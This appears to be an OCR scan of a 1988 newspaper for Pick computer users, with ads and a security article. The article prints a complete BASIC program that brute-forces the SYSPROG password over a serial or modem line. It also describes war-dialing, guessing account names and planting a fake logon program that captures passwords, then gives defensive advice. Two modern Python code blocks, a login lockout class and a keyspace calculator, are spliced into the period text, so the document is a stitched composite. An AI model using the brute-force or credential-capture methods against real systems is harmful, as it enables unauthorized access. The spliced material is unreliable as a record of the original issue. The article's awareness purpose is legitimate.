If your mailing label says 
RENEW, your subscription 
is about to expire! To 
avoid missing your next 
free issue of 
Product Profiles, renew 
IMMEDIATELY by filling 
out and returning the front 
cover coupon for a free 
subscription! The last two 
digits of your mailing label 
indicate the number of the 
last issue you'll receive. 


The free newspaper for Pick users. 


Octob.ljo, 1988 


Pragma’s Product Profiles 

is published periodically by 

Semaphore Corporation, 

207 Granada Drive, Aptos, CA 95003, 
(408) 688-9200. 

Entire contents copyright © 1988 by 
Semaphore Corporation. 

All rights reserved. No part of this 
publication may be reproduced in any 
form or by any means without prior 
written permission from Semaphore. 
Semaphore offers no warranty, either 
express or implied, for any losses due to 
the use of any material published. 

Subscriptions are free, but are available 
only to Pick users with USA mailing 
addresses. Semaphore cannot be 
responsible for lost issues or issues 
returned to us because of address 
changes. 

All material received will be considered 
for publication. Semaphore reserves the 
right to edit all submittals. 

Pick is a trademark of Pick Systems. 
Semaphore Corp. is not affiliated with 
Pick Systems. 
Company _ 
City/State _ 
I use the Pick operating system and my mailing address is in the USA. 
Please continue sending me Pragma's Product Profiles free of charge. 

Signature_ Date_ 

[ ] I also use an Apple® Macintosh™ computer. 
FREE ADVERTISING 

You can advertise your Pick product 
or service in Pragma's Product Profiles, 
absolutely free and without obligations 
of any kind. Free ads must be black 
and white. Ads will be accepted only in 
the following sizes: 2.75", 4.5", 6", or 
10" wide by 2.75", 6", 9.25", or 12.5" 
high. Ads must be single-piece, unmounted, 
camera-ready positives, such 
as a photostat or velox. Do not send 
mechanicals, multi-piece pasteups, 
mounted artwork, negatives, or film. 
Halftones must be 85-line screens. 

Send your ad to: Semaphore Corp., 

207 Granada Drive, Aptos, CA 95003, 

(408) 688-9200. Materials will not be 
returned. Ads are run at Semaphore’s 
discretion, on a space available basis. 

The smaller your ad is, the better are its 
chances of being published. 

FREE MAGNETIC TAPES 

A few cartons of standard 2400 foot 
1/2" reels of magnetic tape are still 
available while supplies last, compliments 
of Semaphore Corporation. For 
your FREE tapes, call (408) 688-9200, 
tell us your Federal Express account 
number to use for shipping charges, 
and we’ll send you a carton of ten tapes 
by Standard Air using our packaging. 

The most recent recipients of free 
cartons of tapes include: Lab Force • 
Jalco Services • Intertec Communications 
• Welders Supply • San Pablo City 
• Allar-tic Financial • GM Nameplate • 
Russell Distributing • Ed’s West • 
Excalibur Technologies • Triad • Wizard 
Software • Systems House • Cox & 
Assoc. • NCAR • YKK USA • Thomas 
Assoc. • Sisco • Serta Mattress. 

FREE GIFT 

Would you like a free gift? Send the 
name, business address, and business 
phone number (as listed in a local 
telephone directory) of a Pick user working 
at a IWOompany to: Pragma, 207 
Granada Drive, Aptos, CA 95003. The 
company you refer must not already be 
on the Product Profiles mailing list, you 
must include your own mailing label 
from this issue, and you should indicate 
you would like a FREE gift. We'll send 
the user a sample copy of Product 
Profiles, and we'll send you a gift as 
your reward for the referral. 

Our thanks to the following readers 
for their recent referrals: Robert 
Norman, Hycor Biomedical • Lisa 
Chaney, Thompson & LaFleur • Bruce 
McAdoo, Southwest Moulding • Jaime 
Godreau, Minicomp Systems • Kenneth 
McConnell, Anthony Pools • Richard 
Davis, Software Firm • Jay Tinker, Omni 
Business • Rick Mokris, Crescendo 
Assoc. • Steven Backman, Backman 
Assoc. 

FREE BACK ISSUES 

A few back issues of Pragma’s 
Product Profiles are still available while 
supplies last: 

#37: Techies Talk Tape Transfers 
#39: A Pop-up Calculator 
#40: The Perfect Environment? 

#41: An F-conv Input Processor 
#42: Automating Shipping Counters 
#43: Two Techies Talk Telecom 
#45: A Software Alarm Clock 
#46: The Alarm Clock Revisited 
#47: When Not To Use B-trees 

To receive your FREE copies, 
indicate which issues you need and 
send a stamped, self-addressed 
envelope with $2.40 postage to: 

Pragma, 207 Granada Drive, Aptos, CA 
95003. 

Does your mailing label say RENEW? 

If so, your subscription is about to 
expire! To avoid missing your next free 
issue of Product Profiles, renew NOW 
by filling out and returning the front 
cover coupon for a free subscription. 

The last two digits of your mailing label 
number indicate the number of the last 
issue you'll receive if you don't renew. 
Breaking in is easy to do. 

Or is it? 

Do you know a disgruntled data processing worker, recently 
fired, who wouldn’t mind destroying a payroll file just to get 
back at a former employer? Or perhaps you’ve heard of 
misguided students, interested in computers, with nothing better 
to do than use modems to dial up computer systems around the 
country, trying to break in? Those are typical profiles of the 
kinds of people who are the biggest threat to the security of a 
computer system. 

Is your installation safe from unauthorized intrusion? 
Probably not, because most Pick systems use simple and very 
insecure methods for controlling access. This article will show 
you just how poor your security is, how easily it can be 
circumvented, and why you should take action and correct your 
security deficiencies now, before someone breaks into your 
system. 

Let’s assume we want to break into your computer. Like 
Pick, most timesharing systems allow access via account names 
and passwords. If we can guess or find a valid account name 
and its password, we’re usually then given access to enough 
other resources, such as programming languages or file 
manipulation commands, to be able to wreak as much havoc as 
we want. 


BREAK-IN 

01 modem%=1 : OPEN "COM1:9600" AS modem% 
02 account$="SYSPROG" 
03 cr$=CHR$(13) : crlfnull$=cr$+CHR$(10)+CHR$(0) 
04 crlfnul2$=crlfnull$+crlfnull$ 
05 please$=crlfnul2$+"Logon please: "+CHR$(7) 
06 bad.acct$=account$+crlfnul2$+"USER-ID?" 
07 lba%=LEN(bad.acct$) 
08 pass.prompt$=account$+crlfnull$+"PASSWORD:" 
09 bad.pass$=crlfnul2$+"PASSWORD?" 
10 tries%=0 : answer$="" : need%=LEN(please$) 
11 WHILE (tries%<3) AND (answer$<>please$) 
12   answer$=INPUT$(LOC(modem%),modem%) 
13   PRINT #modem%,cr$; : GOSUB get.answer 
14   tries%=tries%+1 
15 WEND 
16 IF answer$<>please$ THEN PRINT "[illegible] logon!" : END 
17 PRINT "Logon prompt detected"; : GOSUB show.time 
18 firstc%=ASC("A") : lastc%=ASC("Z") 
19 expected$=pass.prompt$+bad.pass$ 
20 need%=LEN(expected$) 
21 max.pass.len%=3 : DIM codes%(max.pass.len%) 
22 FOR pass.len%=1 TO max.pass.len% 
23   FOR i%=1 TO pass.len% 
24     codes%(i%)=firstc% 
25   NEXT i% 
26   combos%=(lastc%-firstc%+1)^pass.len% 
27   FOR i%=1 TO combos% 
28     PRINT #modem%,account$;cr$; 
29     password$="" 
30     FOR j%=1 TO pass.len% 
31       password$=password$+CHR$(codes%(j%)) 
32     NEXT j% 
33     PRINT #modem%,password$;cr$; 
34     GOSUB bump 
35     GOSUB get.answer 
36     IF answer$<>expected$ THEN 
37       PRINT account$; 
38       IF LEFT$(answer$,lba%)=bad.acct$ THEN 
39         PRINT " isn't a valid account!" 
40       ELSE 
41         PRINT " password = ";password$ 
42       END IF 
43       END 
44     END IF 
45   NEXT i% 
46   PRINT "All passwords of length";pass.len%; 
47   PRINT "have been tried, using" 
48   PRINT CHR$(firstc%);" through ";CHR$(lastc%); 
49   GOSUB show.time 
50 NEXT pass.len% 
51 PRINT "Password not found!" 
52 END 
53 
54 get.answer: start=TIMER 
55 WHILE ((TIMER-start)<5) AND (LOC(modem%)<need%) 
56 WEND 
57 answer$=INPUT$(LOC(modem%),modem%) 
58 RETURN 
59 
60 show.time: PRINT ". Time = ";TIME$ : RETURN 
61 
62 bump: index%=pass.len% 
63 carry: codes%(index%)=codes%(index%)+1 
64 IF codes%(index%)>lastc% THEN 
65   codes%(index%)=firstc% 
66   IF index%>1 THEN index%=index%-1 : GOTO carry 
67 END IF 
68 RETURN 


How do we find an account and its password? Almost every 
timesharing system has at least one special account name 
present at all installations. At a Pick site, that account is 
SYSPROG, so all that’s left to do is find the password for that 
account. 

First, we should try logging on with no password at all. This 
will work for a surprising number of installations! The next step 
is to try all possible passwords of one character each, then two 
characters, and so on. We’ll probably find that the password is 
no longer than three upper case characters, but that still means 
we may have to try up to 26 x 26 x 26 or 17,576 possible 
combinations of that length. It would be easier to program a 
computer to do the search for us. (Instead of manually typing 
password guesses into the Pick machine’s serial port via a 
terminal, we’ll just plug in a computer instead of a terminal and 
have the computer transmit large numbers of password guesses.) 

For example, the BREAK-IN program shown on this page is 
written in Microsoft BASIC, a language readily available on 
most IBM and Apple microcomputers. BREAK-IN will find the 
password for the SYSPROG account when the micro’s serial port 
is connected to the serial port of a Pick machine. 

In Microsoft BASIC, variables ending with % are integers up 
to 32K, variables ending with $ are variable-length strings, and other 
variables are reals. Reserved keywords are shown in bold. Line 
1 of the BREAK-IN program begins by opening the serial output 
port so that PRINT# statements will transmit to the Pick 
machine at 9600 baud. PRINT statements with no modem% port 
number will just output to our console’s display. 

Line 2 defines the account we’re trying to break into. The 
target machine prompts with a carriage return, line feed, null, 
carriage return, line feed, null, “LOGON PLEASE: ”, space, and a 
bell when a carriage return is entered at a logged off port, so line 
5 defines those characters as the expected prompt. Line 6 
defines the response to an invalid account name, line 8 is the 
expected response for a valid account name, and line 9 is the 
response to an invalid password. 

The WHILE loop in lines 11 to 15 outputs just a carriage 
return to try and get the target machine to respond with the 
expected logon prompt. Line 12 clears all pending input before 
the carriage return is sent by line 13. 

Line 21 sets up the FOR loop in lines 22 to 50 to try 
passwords of length 1 through 3 using characters in the A to Z 
range defined by line 18. For a given password length, line 26 

The FOR loop in lines 27 to 45 tries each password, which is stored 
as an array of ASCII codes in codes%. The account name is 
transmitted in line 28, the password is sent by line 33, and the 
expected failure response as defined by lines 19 and 20 is 
waited for (with a five second timeout) by the get.answer routine 
called at line 35. Note that BREAK-IN is carefully programmed 
to expect account names to be echoed, while passwords are not 
echoed. 

If the target machine doesn’t respond with a warning about a 
bad password, then the account name is invalid or the correct 
password has been found. In either case, the program stops in 
line 43. If the program reaches line 51, max.pass.len% will 
have to be increased in line 21 to try longer passwords, or the 
character range defined in line 18 will have to be widened to 
include other characters, such as lower case letters, digits, or 
non-printing characters. 

Note that the BREAK-IN program can just as easily be written 
in Pick BASIC and modified to be used by one Pick machine to 
break into another. Running on a Macintosh Plus connected to a 
small Zebra, BREAK-IN tries about seven passwords a second. 
Using a compiled version written in Pascal instead of interpreted 
BASIC doubled the speed. At 14 passwords per second, all A-Z 
combinations up to length three can be tried in 22 minutes. 
Length four combinations total almost half a million, but that 
still would take only a little over nine hours at most. 


Semaphore Corporation welcomes 
its newest B-TREE-P customers: 

Ukrops Super Markets Inc. 
Vanguard Physicians Services Corp. 
Sabus Group 
Gastech Inc. 

Healthlink Inc. 

Chesapeake Computer Works 
Weldco-Beales 
Glenayre Electronics 











Products and services from Semaphore Corporation 


B-TREE-P 
indexing tools 
for Pick systems 







STRIDE, integrated 
software for 
manufacturing and 
distribution 


Telefolders 
icon-based bulletin 
boards for Macintosh 
and Pick host 
computers 



Pragma's 
Product Profiles, 
the free newspaper 
for Pick users 
Mailing list of 
Macintosh users 
in the USA, on labels, 
tapes, or disks 
Telefolders is software that turns your Macintosh or Pick computer into an iconic bulletin 
board host system. Any Macintosh can dial in or directly connect to your Mac or Pick host, 
and upload and download Mac files. You can control what files callers have access to. 

Unlike text-based bulletin boards, callers see Telefolders host files displayed as standard 
icons, folders, and windows. There are no text menus to read or text commands to type. To 
exchange any Mac program, data, or document with the host, the caller just clicks on the 
desired file icon and selects "Send" or "Receive" from the Mac's pull-down menu. 

Telefolders turns a Macintosh host into a single-user iconic bulletin board. On a Pick host, 
Telefolders supports any number of simultaneous callers sharing the same iconic database, 
plus Telefolders allows password-protected accounts with cash balances and transaction 
histories, folder locking, private folders, "phantom" icons, automatic error retry, and an 
automatic recent acquisitions folder. 

Only Macs can connect to a Telefolders Macintosh host or to a Telefolders Pick host. Your 
copy of the Telefolders host is restricted for use on one computer at a time. 

Telefolders for Mac hosts...$49 

Telefolders for Pick hosts (includes source code)...$995 


B-TREE-P is proven software for using B-trees on your Pick computer. B-trees allow any of 
the data in any of your files to be instantly located and displayed in any sort order, without 
having to wait for SORT or SELECT commands. 

Tired of waiting for your computer to SORT or SELECT your large data files? Need to quickly 
find any attribute? Want to scroll files up or down, in any sort order? With B-TREE-P you can 
instantly search, sort, and scroll any data from any file. 

Now you can instantly look up customers by name, street, ZIP code, or any other field — 
not just by customer number. Now you can immediately find inventory entries by quantity, 
cost, or description — not just by part number. Whatever files you use, now you can instantly 
locate and display your data any way you want, without having to wait for endless SELECTS. 

You can immediately display any record in any file just by typing one or more starting 
characters that match any field in the record. You can display not only a selected record, 
but also any previous and next records, using any sort order you specify. You can jump to 
any record in a file at any time, then browse through the file by scrolling up or down, a 
record at a time or a page at a time, in any sort order. 

B-TREE-P and a few additional minor changes to your existing data entry programs are all 
that is necessary for you to immediately be able to search, browse, or output your data 
quickly and conveniently. Modifications to your existing data files are totally unnecessary. 

B-TREE-P includes all necessary BASIC source code for a B-tree system that works with any 
file. Included are an insertion subroutine, deletion subroutine, lookup subroutine, previous/ 
next subroutine, and complete instructions. Plus, you receive the source code for a 
complete demonstration system that uses B-TREE-P to maintain a name and address file, 
including an editor program for creating and changing name and address records, a 
browser program for displaying records, and a printer program for listing file items in order 
without having to wait for a sort. 

When you order, we'll send you complete B-TREE-P source code and all necessary 
documentation, along with all back issues of our special B-tree newsletter. B-TREE-P includes 
a license agreement limiting your use of B-TREE-P to one computer at a time. Multi-CPU and 
OEM resale agreements are also available. 

B-TREE-P (includes source code)...$395 


Pragma’s Product Profiles is a newspaper published since 1984, and is distributed free to 
Pick operating system users in the USA. Product Profiles features articles of interest to Pick 
users, and offers free advertising for vendors of Pick hardware, software, and services. Back 
issues can be obtained by sending a stamped, self-addressed envelope. 

Pragma’s Product Profiles...free upon request 


Semaphore's mailing list of Mac users is for anyone who needs names and addresses of 
Macintosh users in the USA. Need labels, diskettes, or magnetic tape? Choose and rent any 
quantity from our list of hundreds of thousands of Mac users, with no charge for selecting, 
sorting, media, or delivery. All lists are supplied in ZIP code order, on one-across adhesive 
labels, Macintosh diskettes, or 1600 BPI tape. Mac disks use text-only files, with tab field 
delimiters and carriage return record separators, suitable for importing to most database 
packages. A free HyperCard import stack is included. Mag tape orders require 10,000 
names minimum. Ask for our one-time rental agreement. 

Macintosh user mailing list, per name.59 
STRIDE is an integrated package of manufacturing and distribution software for General 
Automation Zebra computers using the Pick operating system. 

STRIDE includes 18 modules to automate every aspect of a manufacturing or distribution 
company: accounts payable, accounts receivable, cost accounting, customer service, 
engineering, fixed assets, general ledger, inspection, order entry, payroll, personnel, 
production control, programming, purchasing, receiving, shipping, shop floor, and stock 
room. The production control module includes regenerative Materials Requirement 
Planning. 

STRIDE consists of approximately 200 programs, 350 procs, 80 formatted screens, 655K bytes 
of online user documentation, and 225K bytes of online programmer cross reference 
documentation. The approximately 100 files in STRIDE require 2.5 million bytes of disk space 
for installation. STRIDE uses no assembler code. 

STRIDE has a clean, modular, well-structured, and conceptually integrated design. STRIDE 
simultaneously and correctly updates multiple files as soon as transactions are entered, in 
order to provide a database that is always up to date, and to avoid unfriendly batch-style 
processing. 

STRIDE is well-documented, especially for the programmer. Extensive cross-references 
carefully document all program, proc, and data interdependencies, so that modifications 
are easy and predictable. 

STRIDE includes a license agreement and Semaphore's B-TREE-P package. OEM licenses 
are also available. 

STRIDE, source code and documentation..$9,900 

STRIDE, when purchased with a Zebra.no charge 





Find-a-User is an on-line service that lets you locate Macintosh users in the USA. You can 
look up individual users by name, company, or address, and get a complete mailing address 
and phone number for one-time use. You can copy any size range of names, companies, or 
addresses into your computer and prepare your own mailing. Need all Macintosh users at 
business addresses in Fargo, North Dakota? There are no minimum use requirements, so Find- 
a-User is ideal for getting small lists any time you need them. 

You can access Find-a-User with a modem and any computer or terminal. It's menu driven 
and very easy to use. You are only charged for the quantity of name or address items 
retrieved during each call placed at 300, 1200, or 2400 baud. Find-a-User accepts calls 24 
hours a day. There are no registration or subscription charges, no connect or access 
charges of any kind. 

Ask for our one-time use agreement. Addresses may be used for one-time mailings only. 
Phone numbers may be used for one-time follow-up calls only. Dial (408) 662-2717 with a 
modem and logon to the DEMO account to try looking up actual Find-a-User names, 
absolutely free of charge. 

Find-a-User access, per name.49 



Pragma (not to be confused with Pragma's Product Profiles) is the original 48-page 
technical journal for Pick users published quarterly beginning in August 1982. Each issue is 
packed with software and helpful information, including interviews, complete and 
debugged program listings, and detailed, explanatory articles for readers at all levels of 
experience. All seven back issues are available. Issue #1 is a reprint. 

Pragma, per back issue.$25 
COMICS is a complete computerized inmate cash and commissary system for jails. 

COMICS stores all necessary inmate cash and commissary records and then lets jail 
personnel instantly display, change, or print those records via any number of high-speed 
display terminals and printers. 

A typical COMICS installation includes terminals in the stores area for use by commissary 
personnel, and terminals at cash receiving and disbursement points, such as booking areas. 
COMICS automatically records all information about every transaction, and computes totals, 
balances, taxes, and all other necessary calculations. COMICS insures instant posting of all 
inmate cash transactions and commissary sales. COMICS allows accurate cash control and 
fast commissary order processing with a minimum of effort, while completely avoiding all 
paperwork and manual arithmetic. 

COMICS allows a jail to provide better cash control and commissary service with less effort 
and cost, and pays for itself in no time. 

Complete COMICS hardware and software.from $14,300 


Semaphore Corporation • 207 Granada Drive • Aptos, CA 95003 • (408) 688-9200 




















New B-TREE-P installations 
are sprouting up every day! 
Ukrops Super Markets Inc. • Vanguard Physician Services Corp. • Sabus Group • Gastech Inc. • Healthlink Inc. • 
Chesapeake Computer Works • Weldco-Beales • Glenayre Electronics • Educorp • Denticare Inc. • Dealer Software 
Inc. • Aluminum Forge Co. • Business Sciences Inc. • Prestonwood Baptist Church • Benefit Systems Inc. • Emerald 
Publications • George R. Smith • William Bloom & Son Inc. • Dana Corp. • Wayne Schachtel Consulting • Sysgen Inc. 

• Bellingham Cold Storage Co. • Concept Systems Inc. • Brigham Young University • Kilo MicroAir • Diversified 
Computer Systems • Chick-Fil-A • Industrial Indemnity • Columbia County • PEC Vectron • Advanced Technology 

Labs. • Arrowhead Water Co. • Mathis & Assoc. Inc. • Tricor America Inc. • Systems House Inc. • Vancouver Sanitary 
Service • Bottom Line Software Inc. • Brown & Caldwell Labs • Colonial Pacific Leasing • Marion County Republicans 

• Augmented Computer Technology • Premisys • Kripalu Center • Rollings Homes Inc. • Computerized Data • 
Ultimate Corp. • Elliott-Pope School • Toyota of Irving • Victory Express Inc. • Compu Components • Monterey County 

• Butterfields • Electronic Business • Kreepy Krauly USA • Tennessee Mat Co. • Zircon Co. Inc. • Smithsonian Institution 
• Call U.S. Inc. • Meditech • Unison Technologies Inc. • Wavetek • Moore Industries • Systems Support Services • 

Aerojet General • Target Supply • Lilyblad Petroleum • Partners National Health Plans • M. Epstein Inc. • Vitek Systems 
Inc. • J & L Industrial Supply Co. Inc. • Century Publishing Co. • Northwest Agricultural Coop Assoc. • Tampa Bay 
Mgmt. Services Inc. • Spectradyne Inc. • Crosstern Corp. • Magic Chef Air Conditioning Co. • Educators Mutual 
Insurance • Samuelson Assoc. Co. • Anthony Pools • Brooks Equipment Co. Inc. • Associated Students UCLA • Laub 
Group Inc. • United Collection Bureau Inc. • Pactel Paging • Access Software Inc. • Bronson & Bratton Inc. • ACS 
Systems Inc. • Topsy’s International Inc. • Opportunities Unlimited • Glastron-Conroy Ltd. • XScribe Corp. • Minnesota 
Trade Office • Berelson Co. • San Mateo County • Creative Computer Services • Livermore Police Dept. • Hubert 
Distributing Co. • Reinsurance Assoc. • Oman Publishing • Capital Software Ltd. • Martin Cadillac Co. Inc. • NORPAC 

• AIPAC • Medical Accounting Systems • Sierra Software Inc. • May Trucking • Shoob Photography • Specialty 
Underwriters Inc. • Specs Music • ADDS Inc. • Excalibur Computer Systems Inc. • City of Irvine • Cornell University • 
Office Works • Assertive Systems • Conston Inc. • Wofford College • Chicago Kenworth • Eye Care & Surgery Center 

• Chandler Lumber Co. • Mark Card • Penn Independent Assoc. Inc. • Condominium Insurance • John Klein & Assoc. 
Inc. • Cooke Data Systems Inc. • Infocel • Multisystems Inc. • Generation Research • Miami Trading Enterprises • 

System Works Inc. • Flynt Systems Corp. • Life & Health Insurance Co. of America • Information Technology 
Consultants • Tel-A-Train Inc. • Data Operating Systems Inc. • Computyme • Stewart Co. • Trudell Trailer Sales Inc. • 
NCAR • Jet Electronics & Technology Inc. • Distributed Logic Corp. • University of California • Casualty Underwriters 

Inc. • Halprin Supply Co. • Long Beach Community Services. 


A burglar breaking in by modem may be forced to work at 2400 baud 
or even just 1200 baud, but all that’s needed to find a vulnerable system 
is a little time and patience, even if the target’s phone number is 
unknown. For example, commonly available “intelligent” modems can 
be program-driven to automatically dial one phone number after 
another, looking for a carrier tone from an answering modem. There 
are only 10,000 possible numbers for a given three-digit phone number 
prefix. With careful tuning of the modem’s timeout parameters, a 
burglar can easily make a modem dial and test a number every few 
seconds. Even at a generous 30 seconds per number, a burglar can find 
every answering modem in a given prefix area in less than four days. 

Even if the burglar doesn’t know a standard account name such as 
SYSPROG, the BREAK-IN program can be changed to try every possible 
account name first, just as it tries every possible password. Inevitably, a 
system will have some easy-to-find account such as X or BOB or TEST. 
(Can you see why Pick and many other systems make it easy for a 
burglar to find an account by requiring a valid account name before 
prompting for a password? A better design is to prompt for a password 
regardless of what account name is entered, then simply report 
“invalid account and/or password” if either is wrong. That way, a 
burglar can’t tell if either the account or the password or both are 
wrong. Systems should also not allow an unlimited number of logon 
attempts without somehow notifying the system administrator that 
someone is trying to break in.) 
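
The better design described in the parenthetical above, sketched as an added example (not code from the original article or from Pick): the logon check collects both fields before judging either, answers every failure with the same message, and disables a port and notifies the administrator after repeated failures. The class name, thresholds, and sample account are assumptions made for illustration.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque

GENERIC_FAILURE = "invalid account and/or password"
LOCKED_OUT = "port disabled, see the system administrator"
PBKDF2_ROUNDS = 50_000  # assumption: small enough for a quick demo


def _derive(password, salt):
    """Slow salted hash so stored passwords are never kept in the clear."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


class LoginGate:
    """Hypothetical logon front end (not Pick's): one failure message,
    a per-port attempt limit, and a notification to the administrator."""

    def __init__(self, max_failures=3, window=60.0, lockout=900.0,
                 notify=print, clock=time.monotonic):
        self.max_failures = max_failures  # failures tolerated per window
        self.window = window              # seconds over which failures count
        self.lockout = lockout            # seconds a port stays disabled
        self.notify = notify              # callable that reaches the administrator
        self.clock = clock
        self._accounts = {}                  # name -> (salt, derived key)
        self._failures = defaultdict(deque)  # port -> recent failure times
        self._locked_until = {}              # port -> time the lockout ends
        # Dummy record: unknown account names cost the same hashing work.
        self._dummy_salt = os.urandom(16)
        self._dummy_key = _derive(os.urandom(16).hex(), self._dummy_salt)

    def add_account(self, name, password):
        salt = os.urandom(16)
        self._accounts[name] = (salt, _derive(password, salt))

    def attempt(self, port, account, password):
        """Check one logon. Both fields are collected before anything is
        judged, so the reply never says which of the two was wrong."""
        now = self.clock()
        if self._locked_until.get(port, 0.0) > now:
            return False, LOCKED_OUT
        known = account in self._accounts
        salt, key = self._accounts.get(account, (self._dummy_salt, self._dummy_key))
        matches = hmac.compare_digest(_derive(password, salt), key)
        if known and matches:
            self._failures.pop(port, None)
            return True, "logged on"
        recent = self._failures[port]
        recent.append(now)
        while now - recent[0] > self.window:  # forget failures outside the window
            recent.popleft()
        if len(recent) >= self.max_failures:
            self._locked_until[port] = now + self.lockout
            recent.clear()
            self.notify(f"ALERT: {self.max_failures} failed logons on port {port} "
                        f"within {self.window:.0f}s, port disabled for {self.lockout:.0f}s")
        return False, GENERIC_FAILURE


def demo():
    """Replay a constructed guessing run against port 7 and collect the replies."""
    alerts = []
    gate = LoginGate(notify=alerts.append)
    gate.add_account("SYSPROG", "long-Mixed-case-9")  # constructed sample account
    guesses = [("BOB", "A"), ("SYSPROG", "A"), ("SYSPROG", "B"),
               ("SYSPROG", "long-Mixed-case-9")]
    replies = [gate.attempt(7, acct, pw) for acct, pw in guesses]
    return replies, alerts


if __name__ == "__main__":
    replies, alerts = demo()
    for reply in replies:
        print(reply)
    for alert in alerts:
        print(alert)
```

In the constructed run the unknown account BOB and the wrong SYSPROG passwords draw identical replies, and the correct password arrives too late because the port is already disabled.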

Even if a burglar gets into one account, but finds it uninteresting or 
limited, it can be used to find other accounts and passwords if the 
account allows programming to be done. The trick is to leave behind a 
custom logon program that prompts for and accepts account names and 
passwords just like the system does, but saves the information in a file 
before performing the requested logon. If done correctly, users won’t 
notice the difference, and the burglar can come back later and find the 
accounts and passwords saved in the file. 

Another problem is that many systems don’t even force a modem 
port to logoff if a caller hangs up without manually logging off first. As 
a result, a burglar can dial in and be logged on without even having to 
provide an account and password! 

So how can a system be set up for better security? Studies have 
shown that most systems use short account names and passwords, if any 
passwords at all. The obvious and most important step to take is to use 
longer account names and passwords, say at least six characters, chosen 
from a large character set, and to change them regularly. For example, 
at 100 passwords per second, generating all possible passwords of six 
upper case characters takes over a month. If lower case letters are 
included, the required time stretches to over six years! 
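
The search-time figures quoted in this article (22 minutes, a little over nine hours, over a month, over six years) follow from the size of the password space and the guess rate. The calculation below is an added example, not part of the original article; it also goes beyond the text by showing how a logon attempt limit changes the arithmetic, and the limit used (3 failures, then a 900-second lockout) is an assumption.

```python
MINUTE, HOUR, DAY = 60, 3600, 86400
YEAR = 365.25 * DAY


def keyspace(alphabet_size, length):
    """Number of distinct passwords of exactly `length` characters."""
    return alphabet_size ** length


def exhaust_seconds(alphabet_size, length, guesses_per_second, cumulative=False):
    """Worst-case seconds to try every password of `length` characters,
    or of every length from 1 to `length` when cumulative=True."""
    lengths = range(1, length + 1) if cumulative else [length]
    total = sum(keyspace(alphabet_size, n) for n in lengths)
    return total / guesses_per_second


def min_length_to_resist(alphabet_size, guesses_per_second, target_seconds):
    """Shortest length whose keyspace alone outlasts `target_seconds`."""
    length = 1
    while exhaust_seconds(alphabet_size, length, guesses_per_second) < target_seconds:
        length += 1
    return length


def throttled_rate(max_failures, lockout_seconds):
    """Guesses per second left to an intruder when a port is disabled for
    `lockout_seconds` after every `max_failures` wrong passwords."""
    return max_failures / lockout_seconds


def report():
    """Rows of (case, value, unit) covering the article's figures."""
    slow = throttled_rate(3, 900)  # assumed policy: 3 failures, 15 minute lockout
    return [
        ("A-Z, lengths 1-3, 14 guesses/s",
         exhaust_seconds(26, 3, 14, cumulative=True) / MINUTE, "minutes"),
        ("A-Z, length 4, 14 guesses/s",
         exhaust_seconds(26, 4, 14) / HOUR, "hours"),
        ("A-Z, length 6, 100 guesses/s",
         exhaust_seconds(26, 6, 100) / DAY, "days"),
        ("A-Z and a-z, length 6, 100 guesses/s",
         exhaust_seconds(52, 6, 100) / YEAR, "years"),
        ("A-Z, length 3, throttled to 3 guesses per 900 s",
         exhaust_seconds(26, 3, slow) / DAY, "days"),
    ]


if __name__ == "__main__":
    for case, value, unit in report():
        print(f"{case:50s} {value:8.1f} {unit}")
    print("A-Z length needed to last 30 days at 100 guesses/s:",
          min_length_to_resist(26, 100, 30 * DAY))
```

With the assumed attempt limit in place, even a three-letter password takes about two months to exhaust, which is why limiting logon attempts matters as much as password length.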
The Communication Link 
is looking for interested persons 
to receive our newsletter, The Monitor 
and attend our meetings. 

We are the Philadelphia area PICK 
user group and would like to reach 
all PICK users in the Delaware Valley area 
and any other people interested in 
receiving our newsletter. 

We currently mail The Monitor to 550 + 
people 10 times per year and hold 
meetings and/or seminars 10 times per year. 

If you would like to receive The Monitor and be 
advised of our meetings please call or write: 


The Communication Link 
370 Commerce Drive 
Ft. Washington, PA 19034 
215/542-9006 


This month’s mailbag 

A better way to index? 

A short program to generate an inverted file with a sequentially incrementing ID appeared in 
Product Profiles #47. Most Pick implementations (if not all) support the use of attribute 9998 
as an item counter. By using the SREFORMAT verb with attribute 9998, one can build the 
same type of inverted file faster without having to write a BASIC program to do it. 

For example, to invert your example PARTS file by description (AMC1), first ensure that the 
dictionary item 9998 is in the Master Dictionary of the account you are working on. If it is not, 
simply create an item referencing attribute 9998 in line 2. A command like the following may 
then be used for the inversion (bold indicates the user’s input): 

>SREFORMAT PARTS BY AMC1 9998 AMC0 
FILE>INDEX 


Pick itself will then proceed to build the index. A simple COUNT of the INDEX file will fairly 
quickly return the total number of items written, and that number plus one can be entered with 
the editor to create the MAXI item needed by your FIND.PARTS browser program. 

This is simply an alternative way of accomplishing the same thing as your FILL.INDEX 
program, but through the use of the operating system itself. The main advantage of this 
approach over the BASIC program is that it would be faster on large files. 

John Strosnider, San Marcos, CA 

We deliberately decided to use FILL.INDEX instead of SREFORMAT because (1) not all 
Pick-style implementations have REFORMAT verbs, (2) the creation of the MAXI item doesn't 
have to be a separate manual step, (3) REFORMAT and SREFORMAT are always dangerous to 
use because if only a carriage return is accidentally hit at the FILE> prompt, the source file 
gets clobbered, and (4) we guessed FILL.INDEX wouldn't be intolerably slower than 
SREFORMAT, even for large files. Anyone care to try some benchmarks? 

Note that if 9998 items aren't available, the equivalent can be created on most systems with 
the NI symbol in a F; or A; correlative. Also, not all versions of Pick automatically look in the 
MD file if a dictionary word isn't found. In that case, the 9998 item should be placed in the 
PARTS dictionary, not MD. In any case, if you want to use SREFORMAT, you can still avoid a 
COUNT by doing a SSELECT PARTS instead of SREFORMAT, noticing the number selected, 
then using just a plain REFORMAT, and then creating MAXI using the number reported by the 
SSELECT plus one. —Editors 
QUICK PROF, an easy to use, online guide to the PICK 
OS, consists of a master listing of TCL verbs with 
descriptions, proper syntax form, examples, and 
options for each verb — all on the screen 
right in front of you! This online guide is 
accessible to all authorized users from 
all accounts and is easily used with or 
without the menu by a stroke of a key! 

It is a great tool for all users, 
from beginner to expert, at a cost 
of $195 per system. Order your 
copy of QUICK PROF today by 
completing the form below. 

Delivery format is 1/2" 

1600 BPI tape. If you 
need another format, 
call InterComp Corp. 
for a quote at: 

(214) 739-3661. 




YES! 
SEND ME 
QUICK PROF! 

Remit payment 
InterComp Corp 
10670 N Central #750 
Dallas, Texas 75231 


A product of 
InterComp, 
Copyright 
1987 




# of copies X $195 $ 

Sales Tax (Texas only) $_ 




Total amount enclosed is $ 


Contact: 

Company: _ 

Address: 


Computer: 


